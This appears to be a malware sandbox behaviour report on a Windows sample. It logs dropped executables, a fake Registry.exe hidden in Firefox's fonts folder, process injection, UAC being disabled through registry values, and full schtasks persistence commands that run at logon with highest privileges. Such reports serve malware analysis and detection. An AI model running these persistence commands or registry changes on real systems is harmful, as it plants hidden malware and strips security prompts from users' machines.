File created C:\Windows\ShellExperiences\ea9f0e6c9e2dcd C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Windows\TAPI\886983d96e3d3e C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Windows\ShellExperiences\taskhostw.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmp4AE.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmp2342.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmp410B.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmp67F7.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmp67F7.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmp354F.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmp67F7.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmp67F7.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmp5EC5.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmpD116.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmp313.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmp9A04.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmp410B.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmp7D49.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmp7D49.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmpB10B.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmpD116.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmpD2C7.tmp.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3216 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe
PID 3216 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe
PID 3216 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe
PID 2908 wrote to memory of 3692 N/A C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe
PID 2908 wrote to memory of 3692 N/A C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe
PID 2908 wrote to memory of 3692 N/A C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe
PID 2908 wrote to memory of 3692 N/A C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe
PID 2908 wrote to memory of 3692 N/A C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe
PID 2908 wrote to memory of 3692 N/A C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe
PID 2908 wrote to memory of 3692 N/A C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe
PID 3216 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3216 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3216 wrote to memory of 4496 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3216 wrote to memory of 4496 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3216 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3216 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3216 wrote to memory of 3452 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3216 wrote to memory of 3452 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3216 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3216 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3216 wrote to memory of 3292 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3216 wrote to memory of 3292 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3216 wrote to memory of 396 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3216 wrote to memory of 396 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3216 wrote to memory of 3276 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3216 wrote to memory of 3276 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3216 wrote to memory of 3560 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3216 wrote to memory of 3560 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3216 wrote to memory of 4036 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3216 wrote to memory of 4036 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3216 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3216 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3216 wrote to memory of 3720 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\cmd.exe
PID 3216 wrote to memory of 3720 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\cmd.exe
PID 3720 wrote to memory of 4912 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 3720 wrote to memory of 4912 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 3720 wrote to memory of 1712 N/A C:\Windows\System32\cmd.exe C:\Program Files\Mozilla Firefox\fonts\Registry.exe
PID 3720 wrote to memory of 1712 N/A C:\Windows\System32\cmd.exe C:\Program Files\Mozilla Firefox\fonts\Registry.exe
PID 1712 wrote to memory of 1800 N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe C:\Windows\System32\WScript.exe
PID 1712 wrote to memory of 1800 N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe C:\Windows\System32\WScript.exe
PID 1712 wrote to memory of 4240 N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe C:\Windows\System32\WScript.exe
PID 1712 wrote to memory of 4240 N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe C:\Windows\System32\WScript.exe
PID 1712 wrote to memory of 820 N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe C:\Users\Admin\AppData\Local\Temp\tmp4AE.tmp.exe
PID 1712 wrote to memory of 820 N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe C:\Users\Admin\AppData\Local\Temp\tmp4AE.tmp.exe
PID 1712 wrote to memory of 820 N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe C:\Users\Admin\AppData\Local\Temp\tmp4AE.tmp.exe
PID 820 wrote to memory of 684 N/A C:\Users\Admin\AppData\Local\Temp\tmp4AE.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmp4AE.tmp.exe
PID 1800 wrote to memory of 1692 N/A C:\Windows\System32\WScript.exe C:\Program Files\Mozilla Firefox\fonts\Registry.exe
PID 1692 wrote to memory of 1592 N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe C:\Windows\System32\WScript.exe
PID 1692 wrote to memory of 3552 N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe C:\Windows\System32\WScript.exe
PID 1692 wrote to memory of 4224 N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe C:\Users\Admin\AppData\Local\Temp\tmp2342.tmp.exe
PID 4224 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\tmp2342.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmp2342.tmp.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe

"C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b144" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14" /sc ONLOGON /tr "'C:\Users\Default User\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b144" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

